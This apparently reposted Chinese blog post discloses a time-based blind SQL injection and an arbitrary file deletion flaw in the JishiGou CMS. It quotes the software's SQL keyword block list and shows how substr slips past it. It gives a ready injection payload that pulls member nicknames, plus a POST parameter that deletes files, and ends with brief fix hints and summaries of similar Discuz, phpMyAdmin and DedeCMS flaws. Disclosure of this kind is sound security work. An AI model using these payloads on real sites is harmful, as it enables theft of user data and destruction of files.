記事狗盲注及任意檔案刪除

2022-09-23 08:33:09 字數 2141 閱讀 3760

0x1 盲注

0x2 任意檔案刪除

0x1 盲注

在modules/ajax/topic.mod.php中

function group_fields()

' and gid=".$g_id;

$query = $this->databasehandler->query($sql);

$fields_info=$query->getrow();

…...//省略 www.2cto.com

}$gid和$touid沒做過濾,直接帶入查詢,但是查詢之前經過了checkquery()檢測,去除了一些關鍵字元,但是沒有去除完整。

$_config['security']['querysafe']['dfunction']['0'] = 'load_file';

$_config['security']['querysafe']['dfunction']['1'] = 'hex';

$_config['security']['querysafe']['dfunction']['2'] = 'substring';

$_config['security']['querysafe']['dfunction']['4'] = 'ord';

$_config['security']['querysafe']['dfunction']['5'] = 'char';

$_config['security']['querysafe']['daction']['0'] = 'intooutfile';

$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';

$_config['security']['querysafe']['daction']['2'] = 'unionselect';

$_config['security']['querysafe']['daction']['4'] = 'unionall';

$_config['security']['querysafe']['daction']['5'] = 'uniondistinct';

$_config['security']['querysafe']['dnote']['0'] = '/'.'*';

$_config['security']['querysafe']['dnote']['1'] = '*/';

$_config['security']['querysafe']['dnote']['2'] = '#';

$_config['security']['querysafe']['dnote']['3'] = '--';

過濾了substring(其實我才知道mysql也可以用substring),沒過濾substr,

利用基於時間的盲注可以突破,最後構造乙個post包,傳送到ajax.php?code=group_fields

底下引數填寫:

gid=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)&touid=34

最後執行的語句為:

select * from jishigou_group where uid =0 and id=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)

唉~~ 給那兩個引數加個intval 把

0x2 任意檔案刪除

在modules/ajax/event.mod.php中

function onloadpic()

…../省略} 

hid_pic 沒經過過濾,直接被unlink,這個漏洞需要至少普通使用者的許可權

所以我們構造乙個post包,提交到/ajax.php?code=onloadpic&mod=event

底下的引數填寫hid_pic=want_to_delete_file

即可把相應的檔案刪除~

本地測試刪除data/install.lock成功,官網刪除data/install.lock沒成功?? 許可權問題???

修復方案:

do it your self

作者 yy520

Discuz X V3 4後台任意檔案刪除

該漏洞為後台任意檔案刪除,需要有管理員的許可權,所以說危害非常小 docker vulhub master 啟動環境docker compose up d 安裝discuz x v3.4 資料庫名設定為db 訪問後台並登入http your ip admin.php 進入論壇 模組管理 編輯板塊 使...

PhpMyadmin任意檔案讀取漏洞及修復方案

簡要描述 phpmyadmin實現中錯誤的使用了 xml load string函式用於xml解析,但是該函式中預設並沒有處理好外部實體的安全性,導致使用者可以借助xml檔案讀取和訪問應用有許可權訪問的系統和網路資源 詳細說明 libraries import xml.php中 unset data...

DedeCMS v5 7 註冊使用者任意檔案刪除漏洞

漏洞名稱 dedecms v5.7 註冊使用者任意檔案刪除漏洞 危險等級 高危 漏洞檔案 member inc archives check edit.php 漏洞描述 註冊會員使用者可利用此漏洞任意刪除 檔案。修復方法 開啟 member inc archives check edit.php 找...